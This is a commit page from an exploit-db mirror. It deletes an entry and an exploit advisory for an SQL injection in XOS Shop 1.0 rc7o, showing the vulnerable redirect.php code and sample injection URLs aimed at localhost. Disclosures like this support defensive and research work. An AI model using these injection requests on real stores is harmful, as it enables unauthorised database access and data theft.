bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 01_30_2014

Browse source
This commit is contained in:
Offensive Security 2014-01-30 04:25:37 +00:00
parent 816ac77f08
commit fe00572dd8
2 changed files with 0 additions and 44 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
files.csv
View file

@ -27994,7 +27994,6 @@ id,file,description,date,author,platform,type,port
31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 Directory Traversal and Denial of Service Vulnerabilities",2008-02-12,"Luigi Auriemma",windows,remote,0
31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component 'user_id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
31168,platforms/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 (.EBP) Project File Buffer Overflow",2014-01-24,LiquidWorm,windows,dos,0
31171,platforms/php/webapps/31171.txt,"XOS Shop 1.0 rc7o (redirect.php, goto param) - SQL Injection Vulnerability",2014-01-24,"JoKeR DZ",php,webapps,80
31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80
31174,platforms/php/webapps/31174.txt,"Joomla Komento Extension 1.7.2 - Stored XSS Vulnerabilities",2014-01-24,"High-Tech Bridge SA",php,webapps,80
31175,platforms/php/webapps/31175.txt,"Joomla JV Comment Extension 3.0.2 (index.php, id param) - SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80

Can't render this file because it is too large.

43
platforms/php/webapps/31171.txt
View file

@ -1,43 +0,0 @@
################################################################################
# Exploit Title: XOS Shop_v1.0_rc7o Sql Injection Vulnerability
# Date: 23/01/2014
# Exploit Author: JoKeR_StEx
# Vendor Homepage: http://www.xos-shop.com/
# Software Link: http://xos-shop.com/main/index.php/cPath/25/
# Version: v1.0 rc7o
# Tested on: Windows PHP Version 6.0.0-dev
# CVE : [~]
##################################################################################
[-] Description :
XOS Shop is affected by Sql Injection Vulnerability
The Attacker Can inject some MYSQl and exploit it(get content of db)
[+] VUlnerability :
Affected File ==> redirect.php
Line 47;53
<?
switch($_GET['action']){
47: case 'url':
48: if (isset($_GET['goto']) && xos_not_null($_GET['goto'])) {
49: $check_query = xos_db_query("select products_url from " . TABLE_PRODUCTS_DESCRIPTION . " where products_url = '" . xos_db_input($_GET['goto']) . "' limit 1");
50: if (xos_db_num_rows($check_query)) {
51: xos_redirect('http://' . $_GET['goto'])
52: break;
53: }
?>
[-]Exploit
http://127.0.0.1/Xoshop/shop/redirect.php?action=url&goto='
http://127.0.0.1/Xoshop/shop/redirect.php?action=url&goto=[SQLI]
###################################################################################
# Gr33ting's : Asesino04 , Shield Dz , Drr.0ryx & All My Friedns
###################################################################################
eamil : jokerdz44@yahoo.fr
Facebook : fb.me/imadlilong.lasvegas
Twitter : @JoKeR_StEx